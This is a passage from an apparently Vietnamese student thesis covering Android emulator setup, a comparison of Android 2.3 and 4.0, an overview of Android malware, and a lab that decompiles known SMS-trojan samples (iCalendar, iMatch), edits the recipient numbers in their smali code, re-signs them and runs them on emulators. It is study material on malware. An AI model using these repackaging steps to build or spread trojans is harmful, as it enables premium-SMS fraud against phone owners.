64-bit (các phiênbản Windows khác đều tương tự). Đầu tiênbạn cần dowload bộ cài đặt Java SE
tại link sau http://www.oracle.com/technetwork/java/javase/downloads/index.html
19. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
19
Hình 3. Download Java SE
Chọn Jaca Platform (JDK) 8u5 để chuyển sang trang tiếp theo.
Hình 4. Chọn phiên bản Java.
Chọn phiên bản thích hợp với hệ điều hành để tải về. Ở đây mình chọn bản cho Windows
64-bit.
20. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
20
Chạy bộ cài đặt vừa được tải về ta được như hình sau:
B1. Chạy file cài đặt java JDK -> Click Next.
Hình 5:Cài đặt Java
B2. Chọn thư mục cài đặt -> Click Next.
21. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
21
Hình 6:Cài đặt Java
B3. Quá trình cài đặt thành công java JDk sẽ được thông báo như hình dưới ->
Click Close.
22. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
22
Hình 6:Cài đặt Java hoàn tất
Sau khi cài xong, các bạn kiểm tra lại bộ JDK đã được cài đặt thành công bằng cách vào
cmd gõ lệnh “java”. Nếu màn hình hiện ra như sau thì bạn đã cài đặt thành công:
23. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
23
Hình 7. Kiểm tra Java đã được cài đặt.
1.5.2. Cài đặt Eclipse và Android SDK
Trước tiên download bộ ADT Bundle for Windows gồm Eclipse và Android SDK được
tích hợp sẵn tại địa chỉ: http://developer.android.com/sdk/index.html
24. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
24
Hình 8. Download Android SDK.
Chọn dowload để sang trang tiếp theo
Hình 9. Chọn phiên bản Android SDK.
Chọn phiên bản thích hợp va tiến hành dowload (như hình). Sau khi tải xong tiến hành giải
nén ta được các file như hình:
Hình 10. Giải nén file Android SDK tải về.
25. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
25
Để cài đặt Android SDK các bạn có 2 cách:
- Cách 1: Các bạn click chuột vào biểu tượng SDK Manager ở ngoài và tiến hành cài
đặt.
- Cách 2: Các bạn khởi chạy Eclipse lên. Rồi vào mục Android SDK Manager
Hình 12. Khởi động Android SDK Manager.
Sẽ xuất hiện 1 cửa sổ mới như sau :
Hình 13. Chọn và cài đặt các gói API cần thiết.
Download các gói hỗ trợ như:Android SDK Buil-tools, Android SDK Platform-tools, các
phiên bản Android và các gói hỗ trợ khác… bằng cách tích chọn các phần API cần cài rồi click
vào nút Install packages ở góc dưới bên phải
26. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
26
Hình 14.cài đặt các gói API cần thiết.
Công việc tiếp theo là các bạn chỉ cần chờ cho nó download và cài đặt là xong.
1.5.3. Tạo máy AVD (Android Virtual Device).
Sau khi khởi chạy xong Eclipse. Bạn vào : Windows -> Android Virtual
Device Manager.
Hoặc các bạn cũng có thể click ngay vào biểu tượng AVD trên menu của Eclipse :
Hình 15. Khởi động Android Virtual Device Manager.
Click vào New để tạo mới :
27. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
27
Hình 16. Tạo mới máy ảo Android.
Cửa sổ mới mở ra, các bạn điền đầy đủ các thông số vào theo yêu cầu :
28. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
28
Hình 17. Thông số cho máy ao Android.
AVD Name: Các bạn chỉ được sử dụng cách ký tự : A -> Z, a -> z, và “., -, _” mà thôi.
Target: Bạn chọn phiên bản Android để test.
SD Card: Là dung lượng bộ nhớ ảo của thẻ SD.
Và một số thông tin khác…
Các bạn click OK để hoàn thành tạo mới một AVD.
Bây giờ bạn vào phần Android Virtual Device Manager như ban đầu thì bạn sẽ thấy tên
máy ảo mới mình vừa tạo rồi.
Nhấn Start để khởi chạy máy ảo (bạn có thể sẽ phải chờ một khoảng thời gian để máy ảo
khởi chạy):
29. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
29
Hình 18. Khởi động máy ảo Android.
Và đây là giao diện cuối cùng :
30. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
30
Hình 19. Máy ảo Android khởi động hoàn tất.
Thực hiện tương tự để tạo Android phiênbản 4.x.
1.6So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x.
1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.
Android 2.3 (Gingerbread) Android 4.0 (Ice Cream Sandwich)
Cần ít nhất 128MB bộ nhớ có sẵn cho
kernel và cho không gian người sử dụng.
Cần ít nhất 340MB bộ nhớ có sẵn cho kernel
và cho không gian người sử dụng.
Dung lượng RAM tối thiểu cần thiết là
150MB.
Dung lượng RAM tối thiểu cần thiết là
350MB.
31. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
31
Màn hình:
- Màn hình phải có kích cỡ ít nhất 2,5
inch.
- Độ phân giải màn hình ít nhất là 100 dpi.
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779
(16:9).
- Công nghệ màn hình được sử dụng là
công nghệ “square pixels”.
Màn hình:
- Màn hình phải có kích cỡ ít nhất
426x320dp.
- Độ phân giải màn hình ít nhất là 120 dpi.
- Tỉ lệ màn hình từ 1.3333 (4:3) đến 1,85
(16:9).
Yêu cầu có các phím vật lý. Không yêu cầu có các phím vật lý.
Các API Android bao gồm trình quản lý
download các ứng dụng có thể sử dụng để
tải dữ liệu. Trình quản lý download phải
có khả năng tải tập tin có dung lượng ít
nhất 55MB.
Các API Android bao gồm trình quản lý
download các ứng dụng có thể sử dụng để tải
dữ liệu. Trình quản lý download phải có khả
năng tải tập tin có dung lượng ít nhất
100MB.
Kiểm tra hiệu suất dựa trên thời gian mở
ứng dụng (performance matrics):
- Trình duyệt: ít hơn 1300ms.
- MMS/SMS: ít hơn 700ms.
- Báo thức: ít hơn 650ms.
Kiểm tra hiệu suất dựa trên thời gian mở ứng
dụng (performance matrics):
- Trình duyệt: ít hơn 1300ms.
- MMS/SMS: ít hơn 700ms.
- Cài đặt: ít hơn 700ms.
1.6.2. Sự khác nhau về giao diện.
Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng
cảm ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu
lại để xử lý các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn
ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng
rung của thiết bị để tạo phản hồi rung cho người dùng. Những thiết bị phần cứng bên
trong như gia tốc kế, con quay hồi chuyển và cảm biến khoảng cáchđược một số ứng
dụng sử dụng để phản hồi một số hành động khác của người dùng, ví dụ như điều chỉnh màn
hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc cho
phép người dùng lái xe đua bằng xoay thiết bị, giống như đang điềukhiển vô-lăng.
Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu
với các thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc)
trên máy tính để bàn. Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện
ích (widget); biểu tượng ứng dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những
32. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
32
nội dung sống động, cập nhật tự động như dự báo thời tiết, hộp thư của người dùng, hoặc
những mẩu tin thời sự ngay trên màn hình chính. Màn hình chính có thể gồm nhiều trang
xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn hình chính của Android có
thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình dáng cũng như hành vi của
thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên Google Play và các kho
ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình chính, thậm chí
bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn. Phần lớn
những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết
bị Android của họ để phân biệt với các hãng cạnh tranh.
Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình
trạng kết nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm
thông tin quan trọng hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận,
mà không làm gián đoạn hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời
đầu, người dùng có thể nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các
thông tin cập nhật được bổ sung theo tính năng, như có khả năng lập tức gọi ngược lại khi
có cuộc gọi nhỡ mà không cần phải mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho
đến khi người dùng đã đọc hoặc xóa nó đi.
Android 2.3 (Gingerbread) Android 4.0 (Ice Cream Sandwich)
Giao diện đơn giản. Giao diện tinh tế hơn, trong suốt và đẹp
mắt hơn.
Chỉ hỗ trợ phím ảo là phím Home. Hỗ trợ các phím ảo: Home, Back, zoom
Không có widget menu. Có widget menu giúp tìm nhanh thông tin
mà không cần mở ứng dụng.
1.6.3. Sự khác nhau về tính năng.
Android 2.3 (Gingerbread) Android 4.0 (Ice Cream Sandwich)
Thiết kế tối ưu hóa cho smartphones. Thiết kế tối ưu hóa cho cả smartphones và
tablets.
Chỉ có thể xóa tất cả các thông báo cùng
lúc trên trình quản lí thông báo.
Có thể xóa riêng rẽ từng thông báo trên trình
quản lí thông báo.
Chỉ có thể trả lời, ngắt cuộc gọi khi màn
hình bị khóa.
Có thể thực hiện thêm một số tính năng khi
màn hình bị khóa ngoài trả lời, ngắt cuộc gọi
như gửi tin nhắn...
Không có tính năng mở khóa màn hình
nhận diện khuôn mặt (face unlock).
Có tính năng mở khóa màn hình nhận diện
khuôn mặt (face unlock)
33. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
33
Không hỗ trợ chỉnh sửa hình ảnh. Hỗ trợ phần mềm chỉnh sửa hình ảnh, tự
động nhận diện được tất cả các camera trên
thiết bị.
1.6.4. Sự khác nhau về giao thức mạng.
Android 2.3 (Gingerbread) Android 4.0 (Ice Cream Sandwich)
Không hỗ trợ giao thức https Hỗ trợ giao thức https
2. Mã độc trên Android.
2.1. Định nghĩa:
Mã độc là một đoạn code được đưa vào phần mềm nhằm thay đổi các thực thi của hệ điều
hành hoặc các chương trình bảo vệ máy tính mà không cần sự cho phép của người sử dụng.
Bằng cách này, phần mềm có chứa mã độc sẽ:
Phá hoại hệ thống máy tính như xóa, sửa, làm hỏng file, dữ liệu….
Phát tán thư rác.
Lợi dụng máy tính của bạn làm công cụ tấn công các hệ thống mạng máy tính khác.
Đánh cắp thông tin: thông tin về địa chỉ mail, thông tin cá nhân, tài khoản ngân hàng, thẻ
tín dụng,….
2.2. Mã độc trong môi trường Android:
2.2.1. Android là một môi trường lý tưởng cho mã độc phát triển.
Phần lớn các smartphone đều hỗ trợ các ứng dụng email, internet baking…Sử dụng các
ứng dụng này đồng nghĩa với việc cung cấp thông tin cá nhân.
Android hiện tại giữ vị trí số một trong các hệ điều hành dành cho smartphone và máy
tính bảng.
Android là một hệ điều hành mã nguồn mở.
34. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
34
2.2.2. Phân loại mã độc Android.
Có nhiều cách phân loại khac nhau như: Troy Vennon dựa vào cách hoạt động lây nhiễm
của mã độc đã chia ra làm bốn loại, K.H.Khan & M.N.Tahir phân loai mã độc làm 6 nhóm.
Theo trang web forenics chuyên nghiên cứu về mã độc dựa vào mục tiêu của mã độc để chia ra
làm 9 họ:
Đánh cấp thông tin cá nhân
51,3%
Gửi tin nhắn trái phép (IMEL,..)
30,1%
Botnet(spam, thư rác,..)
23,5%
Truy cập Root
18,3%
Tải từ Google-Play
11,3%
Cài đặt các ứng dụng khác
10,4%
Đánh cấp định vị của người dùng
8,7%
Cài đặt các ứng dụng hỗ trợ hacker
7,8%
Trojans (tiếp cận các dịch vụ ngân hàng trực tiếp)
3,5%
2.3. Thực trạng
Theo thống kê được thực hiện dựa trên số liệutừ hệ thống giám sát virút của Bkav, chỉ trong
năm tháng đầu năm 2014, phần mềm bảo vệ smartphone Bkav Mobile Securityđã cập nhật
621.000 mã độc mới xuất hiện, vượt xa số lượng 528.000 củacảnăm 2013. Đặc biệt, mỗi ngày có
262.000 điệnthoại bị nhiễm loại mã độc gửi tin nhắn SMS đến đầu số tính phí. “Đây là các đầu số
thu phí 15.000 đồng/tinnhắn, tính ra mỗi ngày người sử dụng VN bị “móc túi” số tiềnkhổng lồ lên
tới hơn 3,9 tỉ đồng”, báo cáo của Bkav kết luận. Thực tế, số tiềncác loại virút “móc túi”người
dùng smartphone có thể hơn gấp nhiều lần vì có rất nhiều điệnthoại bị nhiễm virút trong một thời
gian dài nhưng chủ nhân không nhận biết và cũng không có biện pháp kiểm tra, theo dõi.
Một báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trọng của mã độc trên
Android - hệ điều hành di động phổ biến nhất thế giới có đến 99,9% số lượng mã độc mới được
phát hiện trong quý I năm 2013 được thiết kế để nhắm đến nền tảng Android. Đây là một con số
35. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
35
báo động về tình trạng mã độc trên nền tảng di động của Google vừa được hãng bảo mật
Kaspersky Lab công bố.
Phần lớn trong số các loại mã độc trên Android là virus trojan, một dạng virus chủ yếu để
sử dụng để đánh cắp tiền của người dùng bị lây nhiễm bằng cách gửi đến họ những tin nhắn lừa
đảo, đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác, ăn cắp thông tin như là mật
khẩu và số thẻ tín dụng, cài đặt lén các phần mềm chưa được cho phép, ….. Loại mã độc này
chiếm đến 63% tổng số các loại mã độc mới được phát tán trên Android trong quý I năm 2013.
Các nhà nghiên cứu bảo mật của Kaspersky cũng báo cáo một sự bùng nồ về số lượng các
mã độc hại trên di động. Theo đó chỉ tính riêng trong 3 tháng đầu năm 2013, Kaspersky đã phát
hiện được số lượng mã độc mới trên các nền tảng di động bằng tổng số lượng mã độc được phát
hiện trong cả năm 2012 mà Android là nền tảng chịu ảnh hưởng nặng nhất.
Với việc Android tiếp tục trở thành “mồi ngon” của hacker trong việc phát tán các loại mã
độc, có vẻ như Android đang dần trở thành một “Windows thứ 2” trên lĩnh vực bảo mật, khi sự
phổ biến của nền tảng này đang thu hút tối đa sự chú ý của các tin tặc, đồng thời việc quản lý
các ứng dụng cho Android một cách lỏng lẻo càng tạo điều kiện cho mã độc được phát tán dễ
dàng hơn trên nền tảng di động này.
Bên cạnh lĩnh vực mã độc trên nền tảng di động, báo cáo về tình trạng bảo mật trong quý
1/2013 của Kaspersky cũng cho biết 91% các vụ phát tán mã độc chủ yếu dựa vào việc phát tán
các đường link trang web có chứa mã độc. Các đường link có chứa mã độc này chủ yếu được
phát tán thông qua email và trên các mạng xã hội như Facebook, Twitter… Đây được xem là
biện pháp được yêu thích nhất hiện nay của hacker.
Con số cụ thể các loại mã độc (bao gồm cả trên nền tảng di động và các nền tảng khác) đã
được Kaspersky phát hiện và vô hiệu hóa trong quý I năm 2013 là
1.345.570..352 mã độc (hơn 1 tỉ mã độc). Trong đó có hơn 60% các loại mã độc phát tán từ 3
quốc giá: Mĩ (25%), Nga (19%) và Hà Lan (14%).
2.4. Malware – tiêubiểu của trên Android.
Đã không cònchỉ là mối lo ngại với người sử dụng máy tính, hiệnnay Malware đã và đang tấn
côngmạnh mẽ đếncác hệ điềuhành dành cho smartphone, đặc biệt là Android.
Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy
tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sử dụng
36. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
36
không hề hay biết. Người viết nên nó ban đầu chỉ tập trung vào máy tính, nhất là Windows khi
nó chiếm đến 90% tổng số Malware xuất hiện trên các nền tảng, bên cạnh đó là các OS khác
như Linux, Chrome OS, MacOs... nhưng không đáng kể. Tuy nhiên giờ đây khi smartphone
đang ngày càng phát triển và phổ biến dần thay thế máy tính từ các công việc soạn thảo văn bản,
giải trí đến giao dịch ngân hàng thì nó trở thành mục tiêu tấn công của Malware.
Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉ
dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan.
Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như
một phần mềm gián điệp (Trojan), phần lớn nhắm vào dịch vụ Mobile Banking trên Smartphone
để lấy cắp thông tin, các thao tác xác nhận... thông qua việc sử dụng SMS Spy, tức là theo dõi
tin nhắn SMS khi bạn thực hiện giao dịch với ngân hàng. Bên cạnh đó là nhằm vào các cuộc gọi
thực hiện trên máy bạn, tắt một số dịch vụ để dễ kiểm soát.
2.4.1. Cơ chế hoạt động của Malware.
Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware
DroidDream. Malware này hoạt động qua 2 giai đoạn:
Giai đoạn 1: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng chứa
Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn
ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.
Giai đoạn 2 : Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép
quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm
tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi DroidDream chiếm được
quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai,
DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống
này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép.
Không giống như giai đoạn 1, người dùng phải khởi động ứng dụng để bắt đầu việc lây
nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều
nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này
được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h
sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất.
Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên
chiếc smartphone của mình.
37. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
37
2.4.2. Mục đích của Malware DroidDream
DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của
con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự
động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến
đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được tìm thấy mới đây
có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền
cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại
sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành
động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn
code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng
thực sẽ bị thu thập bởi các malware này.
Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn
đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì
vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của
người dùng hệ điều hành này.
2.5. Cơ chế bảo mật trong Android.
2.5.1. Tính bảo mật trong Android
Các ứng dụng android được tách biệt với nhau trong quá trình thực thi.
Các ứng dụng android được phân biệt bởi system ID.
Các ứng dụng android phải được signing mới có thể cài đặt vào hệ thồng.
Bảo mật trong android được thể hiện qua cơ chế “Permission”
2.5.2. Cơ chế Permission:
Bất cứ những tác vụ nào gây ảnh hưởng cho các ứng dụng khác, hệ điều hành và người sử
dụng thiết bị đều đươc bảo vệ bởi cơ chế Permission, ví dụ như đọc gửi tin nhắn, truy cập mạng,
thực hiện cuộc gọi, truy cập vào thông tin cá nhân,..Nói cách khác người lập trinh ứng dụng sẽ
khai báo Permissioncho những nguông tài nguyên này sẽ được thông báo đến người dùng trước
khi cài đặt ứng dụng.
2.5.3. Google Play:
Kiểm soát các mã độc trên ứng dụng.
38. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
38
3. Cài đặt một số chương trình có mã độc trên Android.
3.1. iCalendar
iCalendar là 1 chương trìnhdạng lịchxuất xứ từ Trung Quốc có gắn kèm mã độc thực hiệngửi
1 tin nhắn đến1 số điệnthoại địnhtrước mà không thôngqua sự cho phép của người dùng.
3.1.1. Các công cụ cần thiết:
Apktool : https://code.google.com/p/android- apktool/downloads/list)
dex2jar : https://code.google.com/p/dex2jar/)
id-gui : https://code.google.com/p/innlab/downloads/detail?name=jd-gui-
0.3.3.windows.zip&can=2&q=)
File iCalendar.apk: http://securityxploded.com/demystifying-android-malware.php
Hai máy ảo Android (xem hướng dẫn tạo máy ảo ở trên).
3.1.2. Các bước thực hiện:
B1. Dùng phần mềm 7-Zip giải nén file iCalendar,rồi vào đó copy file classes.dex vào folder
chứa công cụ dex2jar.
Hình 20 : Folder iCalendar
39. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
39
B2. Vào CommanWindow di chuyển đếnfolder chứa công cụ dex2jar thực hiện câu lệnh:
dex2jar classes.dex để chuyển file classes.dex thành file .jar ta thu được file classes_dex2jar.jar
.
Hình 21: file classes_dex2jar.jar trong folder dex2jar
B3. Dùng công cụ id-gui mở file classes_dex2jar thu được ở bước 2 để
xem source code của ứng dụng iCalendar.
40. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
40
Hình 22 : Giao diện công cụ id-gui
B4. Vào CommanWindow di chuyển đến folder chứa công cụ apktool
(folder có công cụ apktool phải chứa file iCalendar.apk) thực hiện lần lượt 2 câu lệnh sau:
+ apktool if iCalendar.apk
+ apktool d iCalendar.apk
Hình 23: 2 lệnh apktool thực hiện thành công
Ta thu được folder smali có chứa các file source code ứng dụng.
Hình 24: file iCalendar.smali và SmsReceiver.smali
41. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
41
B5.Sửa các thông số ở 2 file iCalendar.smali và SmsReceiver.smali
để thực hiện trên thiết bị giả lập.
Hình 25: Sửa thông số line
42. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
42
Hình 26: Sửa thông số line 41
B6. Vào CommandWindow thực hiện câu lệnh sau để đóng gói lại ứng dụng iCalendar đã
được chỉnh sửa và ta thu được gói iCalendar.apk mới ở thư mục:…apktooliCalendardist:
apktool b iCalendar
Hình 27: Lệnh đóng gói của apktool thực hiện thành công
B7. Di chuyển đến thư mục …java/bin (có chứa gói iCalendar.apk vừa mới tạo ra ở bước 6)
và thực hiện 3 câu lệnh sau để verify gói apk này có thể sử dụng được trên thiết bị, các bước thực
hiện từng câu lệnh ta sẽ thực hiện theo hướng dẫn trên CommandWindow, kết quả ta thu được
như hình 10:
+ keytool -genkey -v -keystore iCalendar-iCalendar.keystore -alias iCalendar -keyalg
RSA -keysize 2048 -validity 10000
+ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore
iCalendar-iCalendar.keystore iCalendar.apk iCalendar
+ jarsigner -verify -verbose -certs iCalendar.apk
43. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
43
Hình 28: gói apk verified thành công
B8. Dùng lệnh sau để cài đặt ứng dụng vào thiết bị giả lập (ở đây ta cài đặt vào thiết bị 5554):
adb -s emulator-5554 install iCalendar.apk
44. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
44
Hình 29: Lệnh cài đặt ứng dụng vào thiết bị giả lập thành công
B9.Kiểm tra kết quả trên thiết bị.
Hình 30 : Ứng dụng iCalendar đã được cài đặt
B10.Thực hiện kích hoạt Trojan gửi tin nhắn từ thiết bị 5554 sang thiết bị 5556.Kết quả thành
công .
45. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
45
Hình 31: Android02 nhận được tin nhắn từ iCalendar.
3.2. iMatch
Tương tự như iCalendar, iMatchcho phép gửi tinh nhắn trái phépkhi mã độc bị kíchhoạt.
Điểm khác nhau ở đâylà iMatchlà một ứng dụng game và mã độc có thể gửi bốn tinnhắn cho 4 số
điệnthoại giốnghoặc khác nhau.
3.2.1. Các công cụ cần thiết:
Super Apk tool: https://code.google.com/p/super-apk-tool/
iMatch: http://contagiodump.blogspot.com/2011/03/take-sample-leave-sample-mobile-
malware.html
Hai máy ảo Android (xem hướng dẫn tạo máy ảo ở trên).
3.2.2. Các bước thực hiện:
Thực hiện tương tự như với iCalendar.apk nhưng thay thế bằng file iMatch.apk. Tại bước
View Smali Code ta vào tiếp theo đường dẫn .commjutils ta được
46. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
46
Hình 32. Thư mục untils.
Mở file MJUtils.smali bằng Notepad hoặc Notepad++ và thực hiện đổi số điện thoại
người nhận và nội dung tin nhắn tại bốn vị trí sau :
Hình 33. Nội dung tin nhắn 1.
Hình 34. Nội dung tin nhắn 2.
47. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
47
Hình 35. Nội dung tin nhắn 3.
Hình 36. Nội dung tin nhắn 4.
Sau khi lưu lại ta buil và nhận được kết quả
Hình 37. Kết quả chạy chương trình iMatch.
Ta thấy khi ứng dụng iMatch tai máy Android01 được khởi động thì có bốn tin nhắn được
gửi đến máy Android02 (vì ở đây thiết đặt bốn số điện thoại đến giống nhau là máy Android02).
4. Nghiên cứu Kali Linux, cách tạo mã độc trên Kali Linux để xâm nhập vào máy
Android
48. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
48
4.1. Tổng quan
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra
bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack,
xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm
liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của
BackTrack có thên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và
phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng
cần sử dụng khi tác nghiệp.
4.2. Cải tiến của Kali Linux so với Backtrack.
Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần
mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập
nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với
các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của
Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống
tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã
nguồn của các công cụ.
Tính tương thích kiến trúc
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc
ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build
Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.
Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ
trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles.
Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.
Khả năng tùy biến cao
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao
diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc
XFCE tùy theo sở thích và thói quen sử dụng.
49. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
49
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành
Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài
lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng
hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới
hoàn toàn nữa
4.3. Cài đặt Kali Linux
4.3.1. Chuẩn bị.
File iso Kali Linux: http://www.kali.org/downloads/
Máy có cài sẵn Vmware.
